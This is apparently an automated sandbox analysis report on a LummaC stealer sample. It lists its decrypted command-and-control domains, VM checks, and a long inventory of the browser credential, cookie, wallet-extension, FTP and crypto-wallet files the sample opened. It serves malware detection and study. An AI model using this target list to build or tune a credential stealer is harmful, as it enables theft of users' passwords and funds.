Source: Amcache.hve.4.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

API call chain: ExitProcess graph end node

graph_0-26182

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Code function: 0_2_004402C0 LdrInitializeThunk,

0_2_004402C0

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_006AA83B push dword ptr fs:[00000030h]	0_2_006AA83B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_0213092B mov eax, dword ptr fs:[00000030h]	0_2_0213092B
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Code function: 0_2_02130D90 mov eax, dword ptr fs:[00000030h]	0_2_02130D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: uU6IvUPN39.exe	String found in binary or memory: robinsharez.shop
Source: uU6IvUPN39.exe	String found in binary or memory: handscreamny.shop
Source: uU6IvUPN39.exe	String found in binary or memory: chipdonkeruz.shop
Source: uU6IvUPN39.exe	String found in binary or memory: versersleep.shop
Source: uU6IvUPN39.exe	String found in binary or memory: crowdwarek.shop
Source: uU6IvUPN39.exe	String found in binary or memory: apporholis.shop
Source: uU6IvUPN39.exe	String found in binary or memory: femalsabler.shop
Source: uU6IvUPN39.exe	String found in binary or memory: soundtappysk.shop
Source: uU6IvUPN39.exe	String found in binary or memory: skidjazzyric.click

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\uU6IvUPN39.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.00000000006F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: uU6IvUPN39.exe, 00000000.00000002.1539384003.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\DUUDTUBZFW	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\Desktop\uU6IvUPN39.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
